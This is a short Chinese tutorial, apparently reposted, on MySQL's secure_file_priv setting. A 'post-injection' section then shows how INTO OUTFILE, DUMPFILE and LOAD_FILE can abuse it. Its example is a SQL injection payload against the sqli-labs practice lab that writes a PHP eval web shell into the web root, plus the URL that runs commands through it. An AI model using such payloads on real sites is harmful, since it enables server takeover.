Mysql 中的secure_file_priv参数设置方法
secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。
修改完参数之后,必须重启数据库才能生效。
启动MySQL,先查看secure_file_priv的值。
命令:show variables like "secure%" 或select @@secure_file_priv;
1.secure_file_priv = NULL ,限制文件的读取和写入。
2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。
3.secure_file_priv= "", 对文件和读取和写入没有任何限制。
【MySQL漏洞注入后期】
1. select *** into dumpfile 文件路径;
内容在文件中是以一行的形式呈现,多行数据会出现数据保存不全;
dumpfile只能写一行,并且输出中不存在任何格式。
2.select*** into outfile文件路径;
内容有特殊格式转换,该换行换行,较比dumpfile更加好用;
outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。
例如:?id=1')) union select 1,"<?php eval($_REQUEST) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +
调用:url/test.php?123=phpinfo();
3.select*** load_file (下载文件)
selectload_file(文件路径);
到此这篇关于Mysql 中的secure_file_priv参数设置的文章就介绍到这了,更多相关mysql secure_file_priv参数设置内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
来源:https://www.jb51.net/database/330620nj4.htm
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!
页:
[1]